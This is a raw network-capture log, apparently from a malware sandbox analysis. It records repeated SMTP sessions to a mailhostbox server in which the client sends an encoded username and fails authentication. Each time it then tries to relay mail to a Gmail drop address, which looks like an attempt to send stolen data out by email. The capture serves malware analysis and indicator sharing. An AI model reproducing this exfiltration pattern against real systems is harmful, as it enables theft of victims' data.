                                                                          Sep 19, 2024 12:23:36.524127960 CEST58761620208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:36.524403095 CEST61620587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:36.682420015 CEST58761620208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:36.688347101 CEST61620587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:36.874315977 CEST58761620208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:37.352116108 CEST58761621208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:37.352282047 CEST61621587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:37.511847019 CEST58761621208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:37.512027979 CEST61621587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:37.688374996 CEST58761621208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:38.397269964 CEST58761624208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:38.400355101 CEST61624587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:38.558985949 CEST58761624208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:38.559196949 CEST61624587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:38.722505093 CEST58761624208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:39.187166929 CEST58761625208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:39.191631079 CEST61625587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:39.346952915 CEST58761625208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:39.347186089 CEST61625587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:39.505666971 CEST58761625208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:40.466319084 CEST58761624208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:40.466555119 CEST61624587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:40.627969980 CEST58761624208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:40.628160954 CEST61624587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:40.807362080 CEST58761624208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:41.462362051 CEST58761625208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:41.462518930 CEST61625587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:41.621051073 CEST58761625208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:41.621200085 CEST61625587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:41.797960043 CEST58761625208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:42.357266903 CEST58761627208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:42.360388994 CEST61627587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:42.518954992 CEST58761627208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:42.519598007 CEST61627587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:42.681396008 CEST58761627208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:43.418534994 CEST58761629208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:43.418764114 CEST61629587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:43.577435970 CEST58761629208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:43.577665091 CEST61629587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:43.739062071 CEST58761629208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:44.815325022 CEST58761627208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:44.815500021 CEST61627587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:44.815594912 CEST58761627208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:44.975677967 CEST58761627208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:44.980225086 CEST61627587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:45.157860994 CEST58761627208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:45.466655970 CEST58761629208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:45.466823101 CEST61629587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:45.627495050 CEST58761629208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:45.627643108 CEST61629587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:45.803284883 CEST58761629208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:46.684505939 CEST58761632208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:46.684768915 CEST61632587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:46.841156006 CEST58761632208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:46.842761040 CEST61632587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:47.294374943 CEST58761633208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:47.294504881 CEST61633587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:47.452532053 CEST58761633208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:47.452779055 CEST61633587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:47.610874891 CEST58761633208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:51.158401966 CEST58761638208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:51.158540964 CEST61638587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:51.246782064 CEST58761639208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:51.246927977 CEST61639587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:51.319607973 CEST58761638208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:51.320455074 CEST61638587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:51.408229113 CEST58761639208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:51.408404112 CEST61639587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:51.477423906 CEST58761638208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:51.571041107 CEST58761639208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:53.470848083 CEST58761639208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:53.471021891 CEST61639587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:53.525876045 CEST58761638208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:53.525986910 CEST61638587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:53.635034084 CEST58761639208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:53.635298967 CEST61639587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:53.864763975 CEST58761638208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:53.864907026 CEST61638587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:53.865803003 CEST58761639208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:54.047863960 CEST58761638208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:54.048151970 CEST58761639208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:54.218976021 CEST58761638208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:55.532394886 CEST58761642208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:55.532547951 CEST61642587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:55.687222958 CEST58761642208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:55.687401056 CEST61642587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:55.845078945 CEST58761642208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:55.859055042 CEST58761643208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:23:55.859282017 CEST61643587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:23:56.019311905 CEST58761643208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:23:56.019567013 CEST61643587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:23:56.192042112 CEST58761643208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:58.184030056 CEST58761642208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:58.186950922 CEST61642587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:58.187799931 CEST58761642208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:58.346004963 CEST58761642208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:58.346237898 CEST61642587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:58.360615969 CEST58761643208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:23:58.361329079 CEST61643587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:23:58.518626928 CEST58761642208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:23:58.523624897 CEST58761643208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:23:58.524272919 CEST61643587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:23:58.704483032 CEST58761643208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:00.045005083 CEST58761646208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:00.045279026 CEST61646587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:00.208137035 CEST58761646208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:00.213181019 CEST58761647208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:00.213299036 CEST61646587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:00.218782902 CEST61647587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:00.373162031 CEST58761647208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:00.375402927 CEST61647587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:00.378757954 CEST58761646208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:00.532694101 CEST58761647208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:02.529666901 CEST58761647208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:02.530534029 CEST61647587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:02.533288956 CEST58761646208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:02.534852982 CEST61646587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:02.685805082 CEST58761647208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:02.687134981 CEST61647587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:02.694431067 CEST58761646208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:02.694785118 CEST61646587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:02.967334032 CEST58761647208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:02.968831062 CEST58761646208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:04.529225111 CEST58761650208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:04.530011892 CEST61650587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:04.573668003 CEST58761651208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:04.574053049 CEST61651587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:04.854744911 CEST58761650208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:04.855262995 CEST58761651208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:04.855300903 CEST61650587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:04.859446049 CEST61651587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:05.016611099 CEST58761650208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:05.020829916 CEST58761651208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:07.472455978 CEST58761650208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:07.472492933 CEST58761651208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:07.472628117 CEST61651587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:07.472682953 CEST61650587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:07.633399010 CEST58761650208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:07.633538008 CEST61650587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:07.633748055 CEST58761651208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:07.633950949 CEST61651587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:07.871681929 CEST58761651208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:07.871702909 CEST58761650208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:09.399482012 CEST58761654208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:09.399600983 CEST61654587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:09.401037931 CEST58761655208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:09.401149035 CEST61655587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:09.563047886 CEST58761655208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:09.563194036 CEST61655587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:09.725076914 CEST58761655208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:11.053003073 CEST58761657208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:11.057168961 CEST61657587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:11.214119911 CEST58761657208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:11.214282990 CEST61657587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:11.372999907 CEST58761657208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:11.488831043 CEST58761655208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:11.489088058 CEST61655587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:11.648936987 CEST58761655208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:11.649070024 CEST61655587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:11.972366095 CEST58761655208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:13.479078054 CEST58761659208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:13.479218006 CEST61659587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:13.492153883 CEST58761657208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:13.492295980 CEST61657587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:13.640616894 CEST58761659208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:13.640784025 CEST61659587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:13.651936054 CEST58761657208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:13.652159929 CEST61657587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:13.800013065 CEST58761659208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:13.836960077 CEST58761657208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:15.627963066 CEST58761661208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:15.627990007 CEST58761659208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:15.628118992 CEST61661587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:15.628151894 CEST61659587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:15.848618984 CEST58761661208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:15.848635912 CEST58761659208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:16.005336046 CEST58761661208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
